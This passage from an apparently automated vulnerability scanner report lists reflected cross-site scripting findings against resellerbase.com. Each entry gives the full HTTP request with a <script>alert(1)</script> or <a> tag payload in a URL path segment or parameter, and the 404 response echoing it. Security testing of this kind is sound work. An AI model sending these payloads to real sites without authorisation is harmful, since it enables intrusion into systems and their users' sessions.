<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images44ec0<script>alert(1)</script>91ee332c6d3/rating/ was not found on this server.</p>
...[SNIP]...

2.2944. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9220a<script>alert(1)</script>4f7b8488c0c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating9220a<script>alert(1)</script>4f7b8488c0c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating9220a<script>alert(1)</script>4f7b8488c0c/ was not found on this server.</p>
...[SNIP]...

2.2945. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6b1c<script>alert(1)</script>8b164292b08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/?b6b1c<script>alert(1)</script>8b164292b08=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/?b6b1c<script>alert(1)</script>8b164292b08=1 was not found on this server.</p>
...[SNIP]...

2.2946. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78336<script>alert(1)</script>b8297b1aa97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78336<script>alert(1)</script>b8297b1aa97/41/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78336<script>alert(1)</script>b8297b1aa97/41/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2947. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 115f5<script>alert(1)</script>a257854f4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41115f5<script>alert(1)</script>a257854f4e4/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41115f5<script>alert(1)</script>a257854f4e4/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2948. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 874c9<script>alert(1)</script>088484ef7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes874c9<script>alert(1)</script>088484ef7b/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes874c9<script>alert(1)</script>088484ef7b/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2949. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34646<script>alert(1)</script>aa397767314 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos34646<script>alert(1)</script>aa397767314/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos34646<script>alert(1)</script>aa397767314/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2950. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2f7bd<script>alert(1)</script>6f5026c4b06 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images2f7bd<script>alert(1)</script>6f5026c4b06/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images2f7bd<script>alert(1)</script>6f5026c4b06/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2951. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 895d3<script>alert(1)</script>b099585717e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating895d3<script>alert(1)</script>b099585717e/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating895d3<script>alert(1)</script>b099585717e/4half.gif was not found on this server.</p>
...[SNIP]...

2.2952. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c7817<script>alert(1)</script>a21fd07a007 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/4half.gifc7817<script>alert(1)</script>a21fd07a007 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/4half.gifc7817<script>alert(1)</script>a21fd07a007 was not found on this server.</p>
...[SNIP]...

2.2953. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8c1f<script>alert(1)</script>d3a03ec0b55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/4half.gif?b8c1f<script>alert(1)</script>d3a03ec0b55=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/4half.gif?b8c1f<script>alert(1)</script>d3a03ec0b55=1 was not found on this server.</p>
...[SNIP]...

2.2954. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbbe6<script>alert(1)</script>fd78be396b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbbbe6<script>alert(1)</script>fd78be396b/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbbbe6<script>alert(1)</script>fd78be396b/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2955. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57608<script>alert(1)</script>8618cdfab47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4157608<script>alert(1)</script>8618cdfab47/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4157608<script>alert(1)</script>8618cdfab47/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2956. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3cf7d<script>alert(1)</script>46bfafe100d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes3cf7d<script>alert(1)</script>46bfafe100d/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes3cf7d<script>alert(1)</script>46bfafe100d/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2957. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee354<script>alert(1)</script>6198bb17393 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmosee354<script>alert(1)</script>6198bb17393/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmosee354<script>alert(1)</script>6198bb17393/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2958. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f485b<script>alert(1)</script>4467ef76a9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/imagesf485b<script>alert(1)</script>4467ef76a9d/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/imagesf485b<script>alert(1)</script>4467ef76a9d/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2959. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c939d<script>alert(1)</script>c8979437fe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/ratingc939d<script>alert(1)</script>c8979437fe5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/ratingc939d<script>alert(1)</script>c8979437fe5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2960. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload beb48<script>alert(1)</script>1876bfe2879 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/search.phpbeb48<script>alert(1)</script>1876bfe2879?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.phpbeb48<script>alert(1)</script>1876bfe2879?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2961. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8e1ae<a>bc9e2ee8080 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search8e1ae<a>bc9e2ee8080&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search8e1ae<a>bc9e2ee8080&opt=2 was not found on this server.</p>
...[SNIP]...

2.2962. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1ebcc<a>c07ca99d563 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

